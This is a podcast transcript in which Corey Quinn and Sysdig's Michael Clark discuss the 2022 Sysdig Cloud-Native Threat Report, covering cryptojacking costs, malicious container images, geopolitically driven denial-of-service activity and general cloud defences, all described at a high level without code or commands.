Raising Awareness on Cloud-Native Threats with Michael Clark

Episode Summary

Corey is joined by Michael Clark, Director of Threat Research at Sysdig, to discuss the refreshingly non-salesy approach of the 2022 Sysdig Cloud-Native Threat Report. Corey and Michael discuss the perception of cryptomining in your cloud instance being seen as more of a nuisance than the expensive threat it is, as well as other threats out there today and how they gauge the severity of a threat against more than just monetary cost. Michael also reveals how the team was put together to compile the report and why they intentionally moved away from packaging it as a thinly-veiled marketing tool and towards creating a report of substantive value.

Episode Show Notes & Transcript

About Michael

Michael is the Director of Threat Research at Sysdig, managing a team of experts tasked with discovering and defending against novel security threats. Michael has more than 20 years of industry experience in many different roles, including incident response, threat intelligence, offensive security research, and software development at companies like Rapid7, ThreatQuotient, and Mantech. Prior to joining Sysdig, Michael worked as a Gartner analyst, advising enterprise clients on security operations topics.



Links Referenced:

Transcript

Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.



Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Something interesting about this particular promoted guest episode that is brought to us by our friends at Sysdig is that when they reached out to set this up, one of the first things out of their mouth was, “We don’t want to sell anything,” which is novel. And I said, “Tell me more,” because I was also slightly skeptical. But based upon the conversations that I’ve had, and what I’ve seen, they were being honest. So, my guest today—surprising as though it may be—is Mike Clark, Director of Threat Research at Sysdig. Mike, how are you doing?



Michael: I’m doing great. Thanks for having me. How are you doing?



Corey: Not dead yet. So, we take what we can get sometimes. You folks have just come out with the “2022 Sysdig Cloud-Native Threat Report”, which on one hand, it feels like it’s kind of a wordy title, on the other it actually encompasses everything that it is, and you need every single word of that report. At a very high level, what is that thing?



Michael: Sure. So, this is our first threat report we’ve ever done, and it’s kind of a rite of passage, I think for any security company in the space; you have to have a threat report. And the cloud-native part, Sysdig specializes in cloud and containers, so we really wanted to focus in on those areas when we were making this threat report, which talks about, you know, some of the common threats and attacks we were seeing over the past year, and we just wanted to let people know what they are and how they protect themselves.



Corey: One thing that I’ve found about a variety of threat reports is that they tend to excel at living in the fear, uncertainty, and doubt space. And invariably, they paint a very dire picture of the internet about become cascading down. And then at the end, there’s always a, “But there is hope. Click here to set up a meeting with us.” It’s basically a very thinly- veiled cover around what is fundamentally a fear, uncertainty, and doubt-driven marketing strategy, and then it tries to turn into a sales pitch.



This does absolutely none of that. So, I have to ask, did you set out to intentionally make something that added value in that way and have contributed to the body of knowledge, or is it because it’s your inaugural report; you didn’t realize you were supposed to turn it into a terrible sales pitch.



Michael: We definitely went into that on purpose. There’s a lot of ways to fix things, especially these days with all the different technologies, so we can easily talk about the solutions without going into specific products. And that’s kind of way we went about it. There’s a lot of ways to fix each of the things we mentioned in the report. And hopefully, the person reading it finds a good way to do it.



Corey: I’d like to unpack a fair bit of what’s in the report. And let’s be clear, I don’t intend to read this report into a microphone; that is generally not a great way of conveying information that I have found. But I want to highlight a few things that leapt out to me that I find interesting. Before I do that, I’m curious to know, most people who write reports, especially ones of this quality, are not sitting there cogitating in their office by themselves, and they set pen to paper and emerge four days later with the finished treatise. There’s a team involved, there’s more than one person that weighs in. Who was behind this?



Michael: Yeah, it was a pretty big team effort across several departments. But mostly, it came to the Sysdig threat research team. It’s about ten people right now. It’s grown quite a bit through the past year. And, you know, it’s made up of all sorts of backgrounds and expertise.



So, we have machine learning people, data scientists, data engineers, former pen-testers and red team, a lot of blue team people, people from the NSA, people from other government agencies as well. And we’re also a global research team, so we have people in Europe and North America working on all of this. So, we try to get perspectives on how these threats are viewed by multiple areas, not just Silicon Valley, and express fixes that appeal to them, too.



Corey: Your executive summary on this report starts off with a cloud adversary analysis of TeamTNT. And my initial throwaway joke on that, it was going to be, “Oh, when you start off talking about any entity that isn’t you folks, they must have gotten the platinum sponsorship package.” But then I read the rest of that paragraph and I realized that wait a minute, this is actually interesting and germane to something that I see an awful lot. Specifically, they are—and please correct me if I’m wrong on any of this; you are definitionally the expert whereas I am, obviously the peanut gallery—but you talk about TeamTNT as being a threat actor that focuses on targeting the cloud via cryptojacking, which is a fanciful word for, “Okay, I’ve gotten access to your cloud environment; what am I going to do with it? Mine Bitcoin and other various cryptocurrencies.” Is that generally accurate or have I missed the boat somewhere fierce on that? Which is entirely possible.



Michael: That’s pretty accurate. We also think it just one person, actually, and they are very prolific. So, they were pretty hard to get that platinum support package because they are everywhere. And even though it’s one person, they can do a lot of damage, especially with all the automation people can make now, one person can appear like a dozen.



Corey: There was an old t-shirt that basically encompassed everything that was wrong with the culture of the sysadmin world back in the naughts, that said, “Go away, or I will replace you with a very small shell script.” But, on some level, you can get a surprising amount of work done on computers, just with things like for loops and whatnot. What I found interesting was that you have put numbers and data behind something that I’ve always taken for granted and just implicitly assumed that everyone knew. This is a common failure mode that we all have. We all have blind spots where we assume the things that we spend our time on is easy and the stuff that other people are good at and you’re not good at, those are the hard things.



It has always been intuitively obvious to me as a cloud economist, that when you wind up spending $10,000 in cloud resources to mine cryptocurrency, it does not generate $10,000 of cryptocurrency on the other end. In fact, the line I’ve been using for years is that it’s totally economical to mine Bitcoin in the cloud; the only trick is you have to do it in someone else’s account. And you’ve taken that joke and turned it into data. Something that you found was that in one case, that you were able to attribute $8,100 of cryptocurrency that were generated by stealing $430,000 of cloud resources to do it. And oh, my God, we now have a number and a ratio, and I can talk intelligently and sound four times smarter. So, ignoring anything else in this entire report, congratulations, you have successfully turned this into what is beginning to become a talking point of mine. Value unlocked. Good work. Tell me more.



Michael: Oh, thank you. Cryptomining is kind of like viruses in the old on-prem environment. Normally it just cleaned up and never thought of again; the antivirus software does its thing, life goes on. And I think cryptominers are kind of treated like that. Oh, there’s a miner; let’s rebuild the instance or bring a new container online or something like that.



So, it’s often considered a nuisance rather than a serious threat. It also doesn’t have the, you know, the dangerous ransomware connotation to it. So, a lot of people generally just think of as a nuisance, as I said. So, what we wanted to show was, it’s not really a nuisance and it can cost you a lot of money if you don’t take it seriously. And what we found was for every dollar that they make, it costs you $53. And, you know, as you mentioned, it really puts it into view of what it could cost you by not taking it seriously. And that number can scale very quickly, just like your cloud environment can scale very quickly.



Corey: They say this cloud scales infinitely and that is not true. First, tried it; didn’t work. Secondly, it scales, but there is an inherent limit, which is your budget, on some level. I promise they can add hard drives to S3 faster than you can stuff data into it. I’ve checked.



One thing that I’ve seen recently was—speaking of S3—I had someone reach out in what I will charitably refer to as a blind panic because they were using AWS to do something. Their bill was largely $4 a month in S3 charges. Very reasonable. That carries us surprisingly far. And then they had a credential leak and they had a threat actor spin up all the Lambda functions in all of the regions, and it went from $4 a month to $60,000 a day and it wasn’t caught for six days.



And then AWS as they tend to do, very straight-faced, says, “Yeah, we would like our $360,000, please.” At which point, people start panicking because a lot of the people who experience this are not themselves sophisticated customers; they’re students, they’re learning how this stuff works. And when I’m paying $4 a month for something, it is logical and intuitive for me to think that, well, if I wind up being sloppy with their credentials, they could run that bill up to possibly $25 a month and that wouldn’t be great, so I should keep an eye on it. Yeah, you dropped a whole bunch of zeros off the end of that. Here you go. And as AWS spins up more and more regions and as they spin up more and more services, the ability to exploit this becomes greater and greater. This problem is not getting better, it is only getting worse, by a lot.



Michael: Oh, yeah, absolutely. And I feel really bad for those students who do have that happen to them. I’ve heard on occasion that the cloud providers will forgive some debts, but there’s no guarantee of that happening, from breaches. And you know, the more that breaches happen, the less likely they are going to forgive it because they still to pay for it; someone’s paying for it in the end. And if you don’t improve and fix your environment and it keeps happening, one day, they’re just going to stick you with the bill.



Corey: To my understanding, they’ve always done the right thing when I’ve highlighted something to them. I don’t have intimate visibility into it and of course, they have a threat model themselves of, okay, I’m going to spin up a bunch of stuff, mine cryptocurrency for a month—cry and scream and pretend I got hacked because fraud is very much a thing, there is a financial incentive attached to this—and they mostly seem to get it right. But the danger that I see for the cloud provider is not that they’re going to stop being nice and giving money away, but assume you’re a student who just winds up getting more than your entire college tuition as a surprise bill for this month from a cloud provider. Even assuming at the end of that everything gets wiped and you don’t owe anything. I don’t know about you, but I’ve never used that cloud provider again because I’ve just gotten a firsthand lesson in exactly what those risks are, it’s bad for the brand.



Michael: Yeah, it really does scare people off of that. Now, some cloud providers try to offer more proactive protections against this, try to shut down instances really quick. And you know, you can take advantage of limits and other things, but they don’t make that really easy to do. And setting those up is critical for everybody.



Corey: The one cloud provider that I’ve seen get this right, of all things, has been Oracle Cloud, where they have an always free tier. Until you affirmatively upgrade your account to chargeable, they will not charge you a penny. And I have experimented with this extensively, and they’re right, they will not charge you a penny. They do have warnings plastered on the site, as they should, that until you upgrade your account, do understand that if you exceed a threshold, we will stop serving traffic, we will stop servicing your workload. And yeah, for a student learner, that’s absolutely what I want. For a big enterprise gearing up for a giant Superbowl commercial or whatnot, it’s, “Yeah, don’t care what it costs, just make sure you continue serving traffic. We don’t get a redo on this.” And without understanding exactly which profile of given customer falls into, whenever the cloud provider tries to make an assumption and a default in either direction, they’re wrong.



Michael: Yeah, I’m surprised that Oracle Cloud of all clouds. It’s good to hear that they actually have a free tier. Now, we’ve seen attackers have used free tiers quite a bit. It all depends on how people set it up. And it’s actually a little outside the threat report, but the CI/CD pipelines in DevOps, anywhere there’s free compute, attackers will try to get their miners in because it’s all about scale and not quality.



Corey: Well, that is something I’d be curious to know. Because you talk about focusing specifically on cloud and containers as a company, which puts you in a position to be authoritative on this. That Lambda story that I mentioned about, surprise $60,000 a day in cryptomining, what struck me about that and caught me by surprise was not what I think would catch most people who didn’t swim in this world by surprise of, “You can spend that much?” In my case, what I’m wondering about is, well hang on a minute. I did an article a year or two ago, “17 Ways to Run Containers On AWS” and listed 17 AWS services that you could use to run containers.



And a few months later, I wrote another article called “17 More Ways to Run Containers On AWS.” And people thought I was belaboring the point and making a silly joke, and on some level, of course I was. But I was also highlighting very clearly that every one of those containers running in a service could be mining cryptocurrency. So, if you get access to someone else’s AWS account, when you see those breaches happen, are people using just the one or two services they have things ready to go for, or are they proliferating as many containers as they can through every service that borderline supports it?



Michael: From what we’ve seen, they usually just go after a compute, like EC2 for example, as it's most well understood, it gets the job done, it’s very easy to use, and then get your miner set up. So, if they happen to compromise your credentials versus the other method that cryptominers or cryptojackers do is exploitation, then they’ll try to spread throughout their all their EC2 they can and spin up as much as they can. But the other interesting thing is if they get into your system, maybe via an exploit or some other misconfiguration, they’ll look for the IAM metadata service as soon as they get in, to try to get your IAM credentials and see if they can leverage them to also spin up things through the API. So, they’ll spin up on the thing they compromised and then actively look for other ways to get even more.



Corey: Restricting the permissions that anything has in your cloud environment is important. I mean, from my perspective, if I were to have my account breached, yes, they’re going to cost me a giant pile of money, but I know the magic incantations to say to AWS and worst case, everyone has a pet or something they don’t want to see unfortunate things happen to, so they’ll waive my fee; that’s fine. The bigger concern I’ve got—in seriousness—I think most companies do is the data. It is the access to things in the account. In my case, I have a number of my clients’ AWS bills, given that that is what they pay me to work on.



And I’m not trying to undersell the value of security here, but on the plus side that helps me sleep at night, that’s only money. There are datasets that are far more damaging and valuable about that. The worst sleep I ever had in my career came during a very brief stint I had about 12 years ago when I was the director of TechOps at Grindr, the gay dating site. At that scenario, if that data had been breached, people could very well have died. They live in countries where that winds up not being something that is allowed, or their family now winds up shunning them and whatnot. And that’s the stuff that keeps me up at night. Compared to that, it’s, “Well, you cost us some money and embarrassed a company.” It doesn’t really rank on the same scale to me.



Michael: Yeah. I guess the interesting part is, data requires a lot of work to do something with for a lot of attackers. Like, it may be opportunistic and come across interesting data, but they need to do something with it, there’s a lot more risk once they start trying to sell the data, or like you said, if it turns into something very unfortunate, then there’s a lot more risk from law enforcement coming after them. Whereas with cryptomining, there’s very little risk from being chased down by the authorities. Like you said, people, they rebuild things and ask AWS for credit, or whoever, and move on with their lives. So, that’s one reason I think cryptomining is so popular among threat actors right now. It’s just the low risk compared to other ways of doing things.



Corey: It feels like it’s a nuisance. One thing that I was dreading when I got this copy of the report was that there was going to be what I see so often, which is let’s talk about ransomware in the cloud, where people talk about encrypting data in S3 buckets and sneakily polluting the backups that go into different accounts and how your air -gapping and the rest. And I don’t see that in the wild. I see that in the fear-driven marketing from companies that have a thing that they say will fix that, but in practice, when you hear about ransomware attacks, it’s much more frequently that it is their corporate network, it is on-premises environments, it is servers, perhaps running in AWS, but they’re being treated like servers would be on-prem, and that is what winds up getting encrypted. I just don’t see the attacks that everyone is warning about. But again, I am not primarily in the security space. What do you see in that area?



Michael: You’re absolutely right. Like we don’t see that at all, either. It’s certainly theoretically possible and it may have happened, but there just doesn’t seem to be that appetite to do that. Now, the reasoning? I’m not a hundred percent sure why, but I think it’s easier to make money with cryptomining, even with the crypto markets the way they are. It’s essentially free money, no expenses on your part.



So, maybe they’re not looking because again, that requires more effort to understand especially if it’s not targeted—what data is important. And then it’s not exactly the same method to do the attack. There’s versioning, there’s all this other hoops you have to jump through to do an extortion attack with buckets and things like that.



Corey: Oh, it’s high risk and feels dirty, too. Whereas if you’re just, I guess, on some level, psychologically, if you’re just going to spin up a bunch of coin mining somewhere and then some company finds it and turns it off, whatever. You’re not, as in some cases, shaking down a children’s hospital. Like that’s one of those great, I can’t imagine how you deal with that as a human being, but I guess it takes all types. This doesn’t get us to sort of the second tentpole of the report that you’ve put together, specifically around the idea of supply chain attacks against containers. There have been such a tremendous number of think pieces—thought pieces, whatever they’re called these days—talking about a software bill of materials and supply chain threats. Break it down for me. What are you seeing?



Michael: Sure. So, containers are very fun because, you know, you can define things as code about what gets put on it, and they become so popular that sharing sites have popped up, like Docker Hub and other public registries, where you can easily share your container, it has everything built, set up, so other people can use it. But you know, attackers have kind of taken notice of this, too. Where anything’s easy, an attacker will be. So, we’ve seen a lot of malicious containers be uploaded to these systems.



A lot of times, they’re just hoping for a developer or user to come along and use them because your Docker Hub does have the official designation, so while they can try to pretend to be like Ubuntu, they won’t be the official. But instead, they may try to see theirs and links and things like that to entice people to use theirs instead. And then when they do, it’s already pre-loaded with a miner or, you know, other malware. So, we see quite a bit of these containers in Docker Hub. And they’re disguised as many different popular packages.



They don’t stand up to too much scrutiny, but enough that, you know, a casual looker, even Docker file may not see it. So yeah, we see a lot of—and embedded credentials and other big part that we see in these containers. That could be an organizational issue, like just a leaked credential, but you can put malicious credentials into Docker files, to0, like, say an SSH private key that, you know, if they start this up, the attacker can now just log—SSH in. Or other API keys or other AWS changing commands you can put in there. You can put really anything in there, and wherever you load it, it’s going to run. So, you have to be really careful.



[midroll 00:22:15]



Corey: Years ago, I gave a talk at the conference circuit called, “Terrible Ideas in Git” that purported to teach people how to get worked through hilarious examples of misadventure. And the demos that I did on that were, well, this was fun and great, but it was really annoying resetting them every time I gave the talk, so I stuffed them all into a Docker image and then pushed that up to Docker Hub. Great. It was awesome. I didn’t publicize it and talk about it, but I also just left it as an open repository there because what are you going to do? It’s just a few directories in the route that have very specific contrived scenarios with Git, set up and ready to go.



There’s nothing sensitive there. And the thing is called, “Terrible Ideas.” And I just kept watching the download numbers continue to increment week over week, and I took it down because it’s, I don’t know what people are going to do with that. Like, you see something on there and it says, “Terrible Ideas.” For all I know, some bank is like, “And that’s what we’re running in production now.” So, who knows?



But the idea o—not that there was necessarily anything wrong with that, but the fact that there’s this theoretical possibility someone could use that or put the wrong string in if I give an example, and then wind up running something that is fairly compromisable in a serious environment was just something I didn’t want to be a part of. And you see that again, and again, and again. This idea of what Docker unlocks is amazing, but there’s such a tremendous risk to it. I mean, I’ve never understood 15 years ago, how you’re going to go and spin up a Linux server on top of EC2 and just grab a community AMI and use that. It’s yeah, I used to take provisioning hardware very seriously to make sure that I wasn’t inadvertently using something compromised. Here, it’s like, “Oh, just grab whatever seems plausible from the catalog and go ahead and run that.” But it feels like there’s so much of that, turtles all the way down.



Michael: Yeah. And I mean, even if you’ve looked at the Docker file, with all the dependencies of the things you download, it really gets to be difficult. So, I mean, to protect yourself, it really becomes about, like, you know, you can do the static scanning of it, looking for bad strings in it or bad version numbers for vulnerabilities, but it really comes down to runtime analysis. So, when you start to Docker container, you really need the tools to have visibility to what’s going on in the container. That’s the only real way to know if it’s safe or not in the end because you can’t eyeball it and really see all that, and there could be a binary assortment of layers, too, that’ll get run and things like that.



Corey: Hell is other people’s workflows, as I’m sure everyone’s experienced themselves, but one of mine has always been that if I’m doing something as a proof of concept to build it up on a developer box—and I do keep my developer environments for these sorts of things isolated—I will absolutely go and grab something that is plausible- looking from Docker Hub as I go down that process. But when it comes time to wind up putting it into a production environment, okay, now we’re going to build our own resources. Yeah, I’m sure the Postgres container or whatever it is that you’re using is probably fine, but just so I can sleep at night, I’m going to take the public Docker file they have, and I’m going to go ahead and build that myself. And I feel better about doing that rather than trusting some rando user out there and whatever it is that they’ve put up there. Which on the one hand feels like a somewhat responsible thing to do, but on the other, it feels like I’m only fooling myself because some rando putting things up there is kind of what the entire open-source world is, to a point.



Michael: Yeah, that’s very true. At some point, you have to trust some product or some foundation to have done the right thing. But what’s also true about containers is they’re attacked and use for attacks, but they’re also used to conduct attacks quite a bit. And we saw a lot of that with the Russian-Ukrainian conflict this year. Containers were released that were preloaded with denial-of-service software that automatically collected target lists from, I think, GitHub they were hosted on.



So, all a user to get involved had to do was really just get the container and run it. That’s it. And now they’re participating in this cyberwar kind of activity. And they could also use this to put on a botnet or if they compromise an organization, they could spin up at all these instances with that Docker container on it. And now that company is implicated in that cyber war. So, they can also be used for evil.



Corey: This gets to the third point of your report: “Geopolitical conflict influences attacker behaviors.” Something that happened in the early days of the Russian invasion was that a bunch of open-source maintainers would wind up either disabling what their software did or subverting it into something actively harmful if it detected it was running in the Russian language and/or in a Russian timezone. And I understand the desire to do that, truly I do. I am no Russian apologist. Let’s be clear.



But the counterpoint to that as well is that, well, to make a reference I made earlier, Russia has children’s hospitals, too, and you don’t necessarily know the impact of fallout like that, not to mention that you have completely made it untenable to use anything you’re doing for a regulated industry or anyone else who gets caught in that and discovers that is now in their production environment. It really sets a lot of stuff back. I’ve never been a believer in that particular form of vigilantism, for lack of a better term. I’m not sure that I have a better answer, let’s be clear. I just, I always knew that, on some level, the risk of opening that Pandora’s box were significant.



Michael: Yeah. Even if you’re doing it for the right reasons. It still erodes trust.



Corey: Yeah.



Michael: Especially it erodes trust throughout open-source. Like, not just the one project because you’ll start thinking, “Oh, how many other projects might do this?” And—



Corey: Wait, maybe those dirty hippies did something in our—like, I don’t know, they’ve let those people anywhere near this operating system Linux thing that we use? I don’t think they would have done that. Red Hat seems trustworthy and reliable. And it’s yo, [laugh] someone needs to crack open a history book, on some level. It’s a sticky situation.



I do want to call out something here that it might be easy to get the wrong idea from the summary that we just gave. Very few things wind up raising my hackles quite like companies using tragedy to wind up shilling whatever it is they’re trying to sell. And I’ll admit when I first got this report, and I saw, “Oh, you’re talking about geopolitical conflict, great.” I’m not super proud of this, but I was prepared to read you the riot act, more or less when I inevitably got to that. And I never did. Nothing in this entire report even hints in that direction.



Michael: Was it you never got to it, or, uh—



Corey: Oh, no. I’ve read the whole thing, let’s be clear. You’re not using that to sell things in the way that I was afraid you were. And simultaneously I want to say—I want to just point that out because that is laudable. At the same time, I am deeply and bitterly resentful that that even is laudable. That should be the common state.



Capitalizing on tragedy is just not something that ever leaves any customer feeling good about one of their vendors, and you’ve stayed away from that. I just want to call that out is doing the right thing.



Michael: Thank you. Yeah, it was actually a big topic about how we should broach this. But we have a good data point on right after it started, there was a huge spike in denial-of-service installs. And that we have a bunch of data collection technology, honeypots and other things, and we saw the day after cryptomining started going down and denial-of-service installs started going up. So, it was just interesting how that community changed their behaviors, at least for a time, to participate in whatever you want to call it, the hacktivism.



Over time, though, it kind of has gone back to the norm where maybe they’ve gotten bored or something or, you know, run out of funds, but they’re starting cryptomining again. But these events can cause big changes in the hacktivism community. And like I mentioned, it’s very easy to get involved. We saw over 150,000 downloads of those pre-canned denial-of-service containers, so it’s definitely something that a lot of people participated in.



Corey: It’s a truism that war drives innovation and different ways of thinking about things. It’s a driver of progress, which says something deeply troubling about us. But it’s also clear that it serves as a driver for change, even in this space, where we start to see different applications of things, we see different threat patterns start to emerge. And one thing I do want to call out here that I think often gets overlooked in the larger ecosystem and industry as a whole is, “Well, no one’s going to bother to hack my nonsense. I don’t have anything interesting for them to look at.”



And it’s, on some level, an awful lot of people running tools like this aren’t sophisticated enough themselves to determine that. And combined with your first point in the report as well that, well, you have an AWS account, don’t you? Congratulations. You suddenly have enormous piles of money—from their perspective—sitting there relatively unguarded. Yay. Security has now become everyone’s problem, once again.



Michael: Right. And it’s just easier now. It means, it was always everyone’s problem, but now it’s even easier for attackers to leverage almost everybody. Like before, you had to get something on your PC. You had to download something. Now, your search of GitHub can find API keys, and then that’s it, you know? Things like that will make it game over or your account gets compromised and big bills get run up. And yeah, it’s very easy for all that to happen.



Corey: Ugh. I do want to ask at some point, and I know you asked me not to do it, but I’m going to do it anyway because I have this sneaking suspicion that given that you’ve spent this much time on studying this problem space, that you probably, as a company, have some answers around how to address the pain that lives in these problems. What exactly, at a high level, is it that Sysdig does? Like, how would you describe that in an elevator without sabotaging the elevator for 45 minutes to explain it in depth to someone?



Michael: So, I would describe it as threat detection and response for cloud containers and workloads in general. And all the other kind of acronyms for cloud, like CSPM, CIEM.



Corey: They’re inventing new and exciting acronyms all the time. And I honestly at this point, I want to have almost an acronym challenge of, “Is this a cybersecurity acronym or is it an audio cable? Which is it?” Because it winds up going down that path, super easily. I was at RSA walking the expo floor and I had I think 15 different companies I counted pitching XDR, without a single one bothering to explain what that meant. Okay, I guess it’s just the thing we’ve all decided we need. It feels like security people selling to security people, on some level.



Michael: I was a Gartner analyst.



Corey: Yeah. Oh… that would do it then. Terrific. So, it’s partially your fault, then?



Michael: No. I was going to say, don’t know what it means either.



Corey: Yeah.



Michael: So, I have no idea [laugh]. I couldn’t tell you.



Corey: I’m only half kidding when I say in many cases, from the vendor perspective, it seems like what it means is whatever it is they’re trying to shoehorn the thing that they built into filling. It’s kind of like observability. Observability means what we’ve been doing for ten years already, just repurposed to catch the next hype wave.



Michael: Yeah. The only thing I really understand is: detection and response is a very clear detect things and respond to things. So, that’s a lot of what we do.



Corey: It’s got to beat the default detection mechanism for an awful lot of companies who in years past have found out that they have gotten breached in the headline of The New York Times. Like it’s always fun when that, “Wait, what? What? That’s u—what? How did we not know this was coming?”



It’s when a third party tells you that you’ve been breached, it’s never as positive—not that it’s a positive experience anyway—than discovering yourself internally. And this stuff is complicated, the entire space is fraught, and it always feels like no matter how far you go, you could always go further, but left to its inevitable conclusion, you’ll burn through the entire company budget purely on security without advancing the other things that company does.



Michael: Yeah.



Corey: It’s a balance.



Michael: It’s tough because it’s a lot to know in the security discipline, so you have to balance how much you’re spending and how much your people actually know and can use the things you’ve spent money on.



Corey: I really want to thank you for taking the time to go through the findings of the report for me. I had skimmed it before we spoke, but talking to you about this in significantly more depth, every time I start going to cite something from it, I find myself coming away more impressed. This is now actively going on my calendar to see what the 2023 version looks like. Congratulations, you’ve gotten me hooked. If people want to download a copy of the report for themselves, where should they go to do that?



Michael: They could just go to sysdig.com/threatreport. And thank you for having me. It’s a lot of fun.



Corey: No, thank you for coming. Thanks for taking so much time to go through this, and thanks for keeping it to the high road, which I did not expect to discover because no one ever seems to. Thanks again for your time. I really appreciate it.



Michael: Thanks. Have a great day.



Corey: Mike Clark, Director of Threat Research at Sysdig. I’m Cloud Economist Corey Quinn and this is Screaming in the Cloud. If you’ve enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you’ve hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry comment pointing out that I didn’t disclose the biggest security risk at all to your AWS bill, an AWS Solutions Architect who is working on commission.



Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.



Announcer: This has been a HumblePod production. Stay humble.




Newsletter Footer

Get the Newsletter

Reach over 30,000 discerning engineers, managers, enthusiasts who actually care about the state of Amazon’s cloud ecosystems.

"*" indicates required fields

This field is for validation purposes and should be left unchanged.
Sponsor Icon Footer

Sponsor an Episode

Get your message in front of people who care enough to keep current about the cloud phenomenon and its business impacts.